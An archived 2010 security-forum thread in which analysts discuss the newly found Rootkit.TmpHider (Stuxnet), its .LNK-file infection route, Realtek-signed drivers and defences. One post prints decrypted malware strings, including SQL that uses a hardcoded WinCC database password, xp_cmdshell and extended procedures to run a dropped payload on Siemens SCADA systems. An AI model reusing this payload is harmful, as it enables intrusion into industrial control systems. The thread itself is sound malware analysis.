The Wayback Machine - https://web.archive.org/web/20131215102221/http://www.wilderssecurity.com/showthread.php?p=1712134
Wilders Security Forums  

Go Back   Wilders Security Forums > Other Security Topics > malware problems & news
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Search this Thread
  #1  
Old July 12th, 2010, 09:18 AM
AV Expert
 
Join Date: Sep 2009
Posts: 50
Default Rootkit.TmpHider

Modules of current malware were first time detected by "VirusBlokAda" (http://anti-virus.by/en/) company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of malware there was revealed that it uses USB storage device for propagation.

You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).

So you just have to open infected USB storage device using Microsoft Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware.

Malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into systems processes and hide malware itself. That's the reason why you can't see malware files on the infected USB storage device. We have added those drivers to anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with digital signature of Realtek Semiconductor Corp. (www.realtek.com).

Thus, current malware should be added to very dangerous category causes the risk of the virus epidemic at the current moment.

After we have added a new recordes to the anti-virus bases we are admitting a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.



Source: http://anti-virus.by/en/tempo.shtml
__________________
Sergey Ulasen
  #2  
Old July 12th, 2010, 12:08 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Exclamation Re: Rootkit.TmpHider

@sergey ulasen

Thanks for posting

Fascinating, and potentially deadly to many out there, by the sound of it

This would appear to circumvent USB autorun blockers. I expect that AntiExe etc programs like ProcessGuard etc, would block the .SYS etc from installing ? As not many people do not have such programs, i suppose unless their AV's etc have the Defs, they are vulnerable

Please keep us updated on this
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #3  
Old July 12th, 2010, 12:11 PM
AvinashR's Avatar
Very Frequent Poster
 
Join Date: Dec 2009
Location: New Delhi Metallo β-Lactamase 1
Posts: 2,060
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by CloneRanger
@sergey ulasen

Thanks for posting

Fascinating, and potentially deadly to many out there, by the sound of it

This would appear to circumvent USB autorun blockers. I expect that AntiExe etc programs like ProcessGuard etc, would block the .SYS etc from installing ? As not many people do not have such programs, i suppose unless their AV's etc have the Defs, they are vulnerable

Please keep us updated on this

I am sure Tight SRP or AppLocker policy will defeat the execution of this malware.

Remember, if it cannot execute, it cannot infect.
__________________
∆√♪ηάکђ
ℓєтک υηcσммpℓιcαтє
http://www.adminus.net
http://technonxt.wordpress.com
  #4  
Old July 12th, 2010, 12:19 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Lightbulb Re: Rootkit.TmpHider

Originally Posted by AvinashR

Quote:
I am sure Tight SRP or AppLocker policy will defeat the execution of this malware.

Quite possibly, Sully etc should know

Quote:
Remember, if it cannot execute, it cannot infect.

Yes and no ~Comments removed~
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air

Last edited by Cudni : July 12th, 2010 at 01:13 PM. Reason: Removed off topic comments
  #5  
Old July 12th, 2010, 03:15 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Exclamation Re: Rootkit.TmpHider

Another disturbing feature is they are signed with digital signatures of the Realtek Semiconductor Corp

These must be either fake, or manipulated real ones ? Things like this were said to be Impossible, by so called "experts more than once in the last few years
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #6  
Old July 12th, 2010, 05:15 PM
Windchild's Avatar
Frequent Poster
 
Join Date: Jun 2009
Posts: 570
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by sergey ulasen
You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).

A shame there's so little information here. It doesn't sound like the average malware-du-jour. Isn't there any more information on the vulnerability in processing shortcut .LNK files?


Quote:
Originally Posted by CloneRanger
These must be either fake, or manipulated real ones ? Things like this were said to be Impossible, by so called "experts more than once in the last few years

I don't recall any expert saying "this" was impossible. It's always been possible to steal a legit certificate, if whoever owns that cert has lax enough security. It's possible to slap any cert on a file and at a glance it may look legit, but won't actually check out as valid if one bothers to check. There are possibilities like this - there's always even the option of fooling the certificate authority into issueing you a certificate that should belong to someone else (you're not Mozilla Corporation, but some CA might still give you a certificate with that name on it). In this particular case, there's not much information to go on to tell what's actually happened.
__________________
Save your tears, for your tears will not save you :: Shameless LUA troll
  #7  
Old July 12th, 2010, 06:38 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by Windchild

I don't recall any expert saying "this" was impossible.

I was sure i did, so i went and searched. Here's several examples i found.

Even though this article is on PGP i think it's aplicable.

Quote:
Usually this feature of cryptography is much more widely used than encryption. The digital signature is 'impossible' to fake.

http://www.packetstormsecurity.org/p...graphy/pgp.txt

Quote:
Originally Posted by dave

It is believed to be mathematically intractable for someone not in possession of (say) Microsoft's code-signing certificate to sign code and make it look like it came from Microsoft. So, if that's what you mean, fake certificates are as likely as magic pixie dust. http://www.broadbandreports.com/forum/remark,17299839

As i was searching for those conformation links, i also found an interesting article which explains the multiple weaknesses in 1st gen certs, and goes on to show how they can be improved

Quote:
Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks and Consumer Fraud

http://www.antiphishing.org/sponsors...ilityWPcds.pdf
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #8  
Old July 12th, 2010, 07:33 PM
Windchild's Avatar
Frequent Poster
 
Join Date: Jun 2009
Posts: 570
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by CloneRanger
I was sure i did, so i went and searched. Here's several examples i found.

There seems to be some confusion here, due to the vagueness of some statements. None of those comments you quoted claims that it's impossible to have a (valid) digital signature on a malicious file. There's plenty of ways for that: for example, one could steal a cert from some innocent developer and then use it to sign malware. There's even more ways to get an invalid digital signature on a malware: for example, just copying it from some signed file. What those comments you quoted are saying is that it's not mathematically feasible to create a "fake" digital signature that also checks out as valid in someone else's name. When "so called experts" claim digital signatures can't be faked, they're referring to this mathematical difficulty of creating a fake signature that actually checks out as valid. They're not saying you can't steal a cert from someone, or fool a certificate authority into granting you someone else's cert, or such things.

As far as the malware mentioned by the original poster is concerned, there is no information given that would tell us how the Realtek digital signature got on the malicious files. Was a legit Realtek cert stolen? Or is it just a case of copying the cert onto a malware binary, in which case the signature would check out as invalid? Or is it really a case where someone has successfully created a fake cert that checks out as valid, in spite of the mathematical difficulty of this? With the scarce information given here, it's impossible to tell, but the latter is very unlikely. Sure, there's the option of exploiting MD5 collisions, but even though that's theoretically possible, it's not exactly easy, and it's not like you have to use MD5 anyway. What I'm saying here is that the information given in this thread gives us no reason to suspect those "experts" were wrong about the mathematical infeasibility of creating fake digital signatures.

There's a good reason for wanting more information on this case. When so little info is given, it's very difficult to say anything useful about the case. It would be nice to know more details on the .LNK file vulnerability, for example, and details on the digital signature on the malicious files, and many other factors. When one leaves such information out, it feels kind of like a movie teaser trailer - all the good stuff is missing.
__________________
Save your tears, for your tears will not save you :: Shameless LUA troll
  #9  
Old July 12th, 2010, 11:22 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by Windchild

Was a legit Realtek cert stolen? Or is it just a case of copying the cert onto a malware binary, in which case the signature would check out as invalid? Or is it really a case where someone has successfully created a fake cert that checks out as valid, in spite of the mathematical difficulty of this?

I've asked sergey ulasen to keep us updated, so hopefully he will include this aspect too
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #10  
Old July 13th, 2010, 12:01 AM
yankinNcrankin's Avatar
Frequent Poster
 
Join Date: May 2006
Posts: 406
Default Re: Rootkit.TmpHider

Why create when it can be bought.....people in position(s) have been known to sell out.....
  #11  
Old July 13th, 2010, 12:59 AM
AvinashR's Avatar
Very Frequent Poster
 
Join Date: Dec 2009
Location: New Delhi Metallo β-Lactamase 1
Posts: 2,060
Default Re: Rootkit.TmpHider

I haven't received any kind of information from other vendors too, Hope Sergey Ulasen keep us updatedon this topic...
__________________
∆√♪ηάکђ
ℓєтک υηcσммpℓιcαтє
http://www.adminus.net
http://technonxt.wordpress.com
  #12  
Old July 13th, 2010, 05:25 AM
AV Expert
 
Join Date: Sep 2009
Posts: 50
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by AvinashR
I haven't received any kind of information from other vendors too, Hope Sergey Ulasen keep us updatedon this topic...

Additional information about malware is in document:

new_rootkit_en.pdf
__________________
Sergey Ulasen
  #13  
Old July 13th, 2010, 08:13 AM
AvinashR's Avatar
Very Frequent Poster
 
Join Date: Dec 2009
Location: New Delhi Metallo β-Lactamase 1
Posts: 2,060
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by sergey ulasen
Additional information about malware is in document:

Attachment 219888

Thanks for additional document...
__________________
∆√♪ηάکђ
ℓєтک υηcσммpℓιcαтє
http://www.adminus.net
http://technonxt.wordpress.com
  #14  
Old July 13th, 2010, 02:03 PM
Windchild's Avatar
Frequent Poster
 
Join Date: Jun 2009
Posts: 570
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by sergey ulasen
Additional information about malware is in document:

Attachment 219888

Thanks for that There's still some questions about the .LNK file vulnerability worth asking, though. Such as: Has the vulnerability been reported to Microsoft? And most importantly the nature of the vulnerability. I assume it leads to arbitrary code execution with the privileges of explorer.exe (the privileges of currently logged-in user, that is to say)? If that is so, then the malware wouldn't be able to infect a system unless the user was logged in as an administrator. It would be nice for such details to be mentioned, seeing how it has a great effect on how dangerous the vulnerability is, especially considering that new Windows versions come with UAC enabled by default.


Quote:
Originally Posted by yankinNcrankin
Why create when it can be bought.....people in position(s) have been known to sell out.....

Indeed. Most everyone has a price, and in larger companies it isn't even all that unusual to have a rogue-ish employee. Of course, the problem is in the risk of getting caught.
__________________
Save your tears, for your tears will not save you :: Shameless LUA troll
  #15  
Old July 13th, 2010, 02:34 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Default Re: Rootkit.TmpHider

Good work Ulasen Sergey and Kupreev Oleg

Quotes from the PDF

Quote:
Operating System Windows 7 Enterprise Edition x86 with all latest updates is vulnerable, that means malware uses vulnerability that still exists and hasn�t been closed in OS Windows

Amazing, there's always something for the bad guys to keep them busy and find, and they sure do, and make use of them.

Unbelievable you havn't heard back from Realtek

Quote:
Drivers that have digital signature are used for hiding. That is the reason why it is difficult to identify them independently since antirootkits are misled. Also detection of these drivers by antivirus companies is absent for a long time, probably because of screening these examples out on the primary stage of processing binary files in incoming flow.

Vendors have known for several years that numerous fake etc certs have accompanied malware. So they havn't had any excuse for ignoring this vector

Nice to see Gmer still on the ball

Re - oem6c.pnf and oem7a.pnf

Quote:
The PNF file type is primarily associated with 'Portable Network Graphics Frame'.

Detailed information for file extension PNF:
Primary association: Portable Network Graphics Frame
Other applications associated with file type PNF:

* Precompiled Setup Information(Temporary file seen during installs)
* Windows (Precompiled Setup Information) by Microsoft Corporation

A precompiled INF file. Windows creates a PNF file for each INF file to facilitate efficient processing. If a PNF file does not exist, Setup generates one for the INF file. The identifying characters used for this association are - Hex: 01 01

http://filext.com/file-extension/PNF

Could this be partially a new Graphics vulnerabilty exploit ? similar in "some" way/s to the MetaFiles exploits http://www.wilderssecurity.com/showthread.php?t=113044
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #16  
Old July 13th, 2010, 02:57 PM
Windchild's Avatar
Frequent Poster
 
Join Date: Jun 2009
Posts: 570
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by CloneRanger
Re - oem6c.pnf and oem7a.pnf

Could this be partially a new Graphics vulnerabilty exploit ? similar in "some" way/s to the MetaFiles exploits http://www.wilderssecurity.com/showthread.php?t=113044

No, I don't see how it could. According to Sergey's PDF, the malware infects the system by exploiting an unpatched vulnerability in processing LNK files. There is no mention of any other vulnerability being exploited. Those .pnf files are not graphic files - as stated in the PDF, they're encrypted. They probably contain things like the malware's configuration data.
__________________
Save your tears, for your tears will not save you :: Shameless LUA troll
  #17  
Old July 13th, 2010, 04:23 PM
wat0114
 
Posts: n/a
Default Re: Rootkit.TmpHider

The questions I have are:
  1. what is the Windows vulnerability?
  2. How do the files get from the usb stick to the directories, especially in a standard account?
  3. how do the malicious files execute?
  4. would a whitelist or other anti-executable measure stop this?
  #18  
Old July 13th, 2010, 07:09 PM
CloneRanger's Avatar
Massive Poster
 
Join Date: Jan 2006
Location: Here
Posts: 4,179
Default Re: Rootkit.TmpHider

oem6c.pnf and oem7a.pnf listed in here - http://www.threatexpert.com/report.a...d06c03f92d0c13

Malware-Cryptor.Win32.Inject.gen.2 - Inject.gen.2 "might" be connected with the Bifrost Trojan ? - http://www.threatexpert.com/reports.....gen.2&x=7&y=8

MRXCLS - MRXNET - mrxcls.sys - http://www.sophos.com/security/analy...jstuxneta.html

Those same 3 files in this ComboFix log Files Created on 2010-07-04 - http://pastebin.com/r5QvBHRt

Also here - http://forum.drweb.com/index.php?showtopic=293997

*

@Windchild

Re - oem6c.pnf and oem7a.pnf

OK, the .PNF extension must just be a coincidence then !
__________________
.
Malware = You don't scare me

A different perspective https://rt.com - https://rt.com/on-air
  #19  
Old July 14th, 2010, 02:25 AM
Meriadoc's Avatar
Very Frequent Poster
 
Join Date: Mar 2006
Location: Cymru
Posts: 2,642
Default Re: Rootkit.TmpHider

Thanks Sergey for analysis.

Files put in root of vm, detection by arks
Attached Images
  
__________________
Who controls the past controls the future
Who controls the present controls the past

vmworld

Last edited by Meriadoc : July 14th, 2010 at 08:01 AM.
  #20  
Old July 14th, 2010, 04:26 AM
AV Expert
 
Join Date: Sep 2009
Posts: 50
Default Re: Rootkit.TmpHider

We wrote an e-mail to Microsoft, but they haven't answered us.
I think most of the antivirus vendors have paid attention to this virus and I hope that they report Microsoft and Realtek about problem too.
__________________
Sergey Ulasen
  #21  
Old July 14th, 2010, 07:59 AM
Meriadoc's Avatar
Very Frequent Poster
 
Join Date: Mar 2006
Location: Cymru
Posts: 2,642
Default Re: Rootkit.TmpHider

thanks EP
Attached Thumbnails
Click image for larger version

Name:	gmerusbrk3.JPG
Views:	60
Size:	110.1 KB
ID:	219914  

__________________
Who controls the past controls the future
Who controls the present controls the past

vmworld

Last edited by Meriadoc : July 14th, 2010 at 08:11 AM.
  #22  
Old July 14th, 2010, 12:26 PM
Infrequent Poster
 
Join Date: Jul 2010
Posts: 2
Default Re: Rootkit.TmpHider

hi guys,

has anyone already taken a deeper look at the malware?

i found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026

Code:
SOFTWARE\Microsoft\MSSQLServer pdl GracS\ 2WSXcder WinCCConnect master .\WinCC sqloledb GracS\cc_tlg7.sav Step7\Example use [%s] declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t) use master select name from master..sysdatabases where filename like N'%s' exec master..sp_attach_db 'wincc_svr',N'%s',N'%s' exec master..sp_detach_db 'wincc_svr' use wincc_svr or SOFTWARE\SIEMENS\WinCC\Setup STEP7_Version SOFTWARE\SIEMENS\STEP7 SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation NTVDM TRACE .MCP .zip ~DT %s\WINCC DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE END DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int, @adss int, @aip int, @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss ) BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog ) EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET @aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq: EXEC sp_dropextendedproc sp_dumpdbilog DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC sp_dropextendedproc sp_dumpdbilog endq: DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: DROP TABLE sysbinlog 0123456789ABCDEF CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x %SystemRoot%\system32\netapi32.dll %SystemRoot%\system32\kernel32.dll .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;') view MCPVREADVARPERCON as select MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIABLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIABLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKOLL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDESC.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,MCPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIABLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASDATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPTVARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCALETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCPTVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC ((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')

this points me to the Siemens WinCC SCADA system.
looks like this malware was made for espionage.
  #23  
Old July 14th, 2010, 12:49 PM
Infrequent Poster
 
Join Date: May 2008
Posts: 2
Default Re: Rootkit.TmpHider

Hello everybody,

*** Thank both Ulasen Sergey and Kupreev Oleg for this work ! ***

ComboFix (by sUBs) and MBAM are already able to remove the infection.


I'm looking forward to test it with KIS 2011.
==> Edit : KIS 2011 successfully prvent the infection
http://www.lutile.be/images/erf/tmphider.JPG

Best regards,

Last edited by WawaSeb : July 15th, 2010 at 11:18 AM.
  #24  
Old July 15th, 2010, 08:31 AM
Meriadoc's Avatar
Very Frequent Poster
 
Join Date: Mar 2006
Location: Cymru
Posts: 2,642
Default Re: Rootkit.TmpHider

Quote:
Originally Posted by frank_boldewin
hi guys,

has anyone already taken a deeper look at the malware?..looks like this malware was made for espionage.
Mm, what other reason for targeting WinCC Scada system.
__________________
Who controls the past controls the future
Who controls the present controls the past

vmworld

Last edited by Meriadoc : July 15th, 2010 at 09:10 AM.
  #25  
Old July 15th, 2010, 01:37 PM
Searching_ _ _'s Avatar
Very Frequent Poster
 
Join Date: Jan 2008
Location: iAnywhere
Posts: 1,988
Default Re: Rootkit.TmpHider

Quote:
Human machine interface (HMI) software enables operators to manage industrial and process control machinery via a computer-based graphical user interface (GUI). The computer on which HMI software is installed is called a human machine interface or HMI. There are two basic types of HMI: supervisory level and machine level. Supervisory level HMI is designed for control room environments and used for system control and data acquisition (SCADA), a process control application which collects data from sensors on the shop floor and sends the information to a central computer for processing. Machine level HMI uses embedded, machine-level devices within the production facility itself. Most human machine interface (HMI) software is designed for either supervisory level HMI or machine level HMI
Industrial_Engineering_Software
__________________
Americans are the enemy? Mil. can arrest you?
What the heck is going on?
 

Wilders Security Forums > Other Security Topics > malware problems & news « Previous Thread | Next Thread »

Thread Tools Search this Thread

Posting Settings
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT -5. The time now is 05:22 AM.